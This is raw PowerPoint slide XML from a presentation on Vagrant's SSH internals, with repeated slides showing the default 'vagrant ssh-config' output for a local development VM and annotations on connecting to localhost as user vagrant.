            <a:ext cx="322580" cy="353060"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="322580" h="353060">
                <a:moveTo>
                  <a:pt x="322074" y="83426"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="315517" y="50952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297636" y="24434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="271116" y="6555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238640" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206166" y="6555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179648" y="24434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161769" y="50952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155213" y="83426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161769" y="115899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179648" y="142417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206166" y="160296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238640" y="166852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="271116" y="160296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297636" y="142417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315517" y="115899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322074" y="83426"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="322580" h="353060">
                <a:moveTo>
                  <a:pt x="168423" y="268846"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="161805" y="236067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143758" y="209299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116991" y="191250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84212" y="184632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51431" y="191250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24663" y="209299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617" y="236067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="268846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617" y="301625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24663" y="328393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51431" y="346441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84212" y="353060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116991" y="346441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143758" y="328393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161805" y="301625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168423" y="268846"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5060">
            <a:solidFill>
              <a:srgbClr val="40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04701" y="2290706"/>
            <a:ext cx="172700" cy="1727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299" y="2805690"/>
            <a:ext cx="188958" cy="1889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8589" y="699201"/>
            <a:ext cx="3484879" cy="2287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90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration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12700" marR="2447925">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="25" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>ssh-conig  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15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default</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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HostName 127.0.0.1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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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1</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="2440305">
              <a:lnSpc>
                <a:spcPct val="134300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant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# 2  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Port 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2222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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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3</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="1788795">
              <a:lnSpc>
                <a:spcPct val="101400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>UserKnownHostsFile</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75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/dev/null  StrictHostKeyChecking no  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>PasswordAuthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15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no</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="5080">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>IdentityFile </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>”/home/user/.vagrant.d/insecure_private_key”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# 4  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>IdentitiesOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>yes</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>LogLevel </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>FATAL</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="74295">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-8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localhost.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6546" y="3170661"/>
            <a:ext cx="97790" cy="1130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600" spc="-55" dirty="0"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17" y="190436"/>
            <a:ext cx="20148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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-254" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-195" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436773" y="1366288"/>
            <a:ext cx="171913" cy="1719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6929" y="1553349"/>
            <a:ext cx="322580" cy="353060"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="322580" h="353060">
                <a:moveTo>
                  <a:pt x="322074" y="83426"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="315517" y="50952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297636" y="24434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="271116" y="6555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238640" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206166" y="6555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179648" y="24434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161769" y="50952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155213" y="83426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161769" y="115899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179648" y="142417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206166" y="160296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238640" y="166852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="271116" y="160296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297636" y="142417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315517" y="115899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322074" y="83426"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="322580" h="353060">
                <a:moveTo>
                  <a:pt x="168423" y="268846"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="161805" y="236067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143758" y="209299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116991" y="191250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84212" y="184632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51431" y="191250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24663" y="209299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617" y="236067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="268846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617" y="301625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24663" y="328393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51431" y="346441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84212" y="353060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116991" y="346441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143758" y="328393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161805" y="301625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168423" y="268846"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5060">
            <a:solidFill>
              <a:srgbClr val="40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04701" y="2290706"/>
            <a:ext cx="172700" cy="1727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304" y="2803791"/>
            <a:ext cx="190723" cy="1907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8589" y="699201"/>
            <a:ext cx="3484879" cy="2287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90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration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12700" marR="2447925">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="25" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>ssh-conig  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15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default</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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HostName 127.0.0.1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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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1</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="2440305">
              <a:lnSpc>
                <a:spcPct val="134300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant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# 2  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Port 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2222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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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3</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="1788795">
              <a:lnSpc>
                <a:spcPct val="101400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>UserKnownHostsFile</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75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/dev/null  StrictHostKeyChecking no  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>PasswordAuthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15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no</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="5080">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>IdentityFile </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>”/home/user/.vagrant.d/insecure_private_key”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# 4  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>IdentitiesOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>yes</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>LogLevel </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>FATAL</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="74930">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as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25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>username.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6546" y="3170661"/>
            <a:ext cx="97790" cy="1130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600" spc="-55" dirty="0"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17" y="190436"/>
            <a:ext cx="20148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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-254" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-195" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436773" y="1366288"/>
            <a:ext cx="171913" cy="1719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6929" y="1553349"/>
            <a:ext cx="322580" cy="353060"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="322580" h="353060">
                <a:moveTo>
                  <a:pt x="322074" y="83426"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="315517" y="50952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297636" y="24434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="271116" y="6555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238640" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206166" y="6555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179648" y="24434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161769" y="50952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155213" y="83426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161769" y="115899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179648" y="142417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206166" y="160296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238640" y="166852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="271116" y="160296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297636" y="142417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315517" y="115899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322074" y="83426"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="322580" h="353060">
                <a:moveTo>
                  <a:pt x="168423" y="268846"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="161805" y="236067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143758" y="209299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116991" y="191250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84212" y="184632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51431" y="191250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24663" y="209299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617" y="236067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="268846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617" y="301625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24663" y="328393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51431" y="346441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84212" y="353060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116991" y="346441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143758" y="328393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161805" y="301625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168423" y="268846"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5060">
            <a:solidFill>
              <a:srgbClr val="40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04701" y="2290706"/>
            <a:ext cx="172700" cy="1727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324" y="2803434"/>
            <a:ext cx="191954" cy="1919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8589" y="699201"/>
            <a:ext cx="4176395" cy="2287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90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration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12700" marR="3139440">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
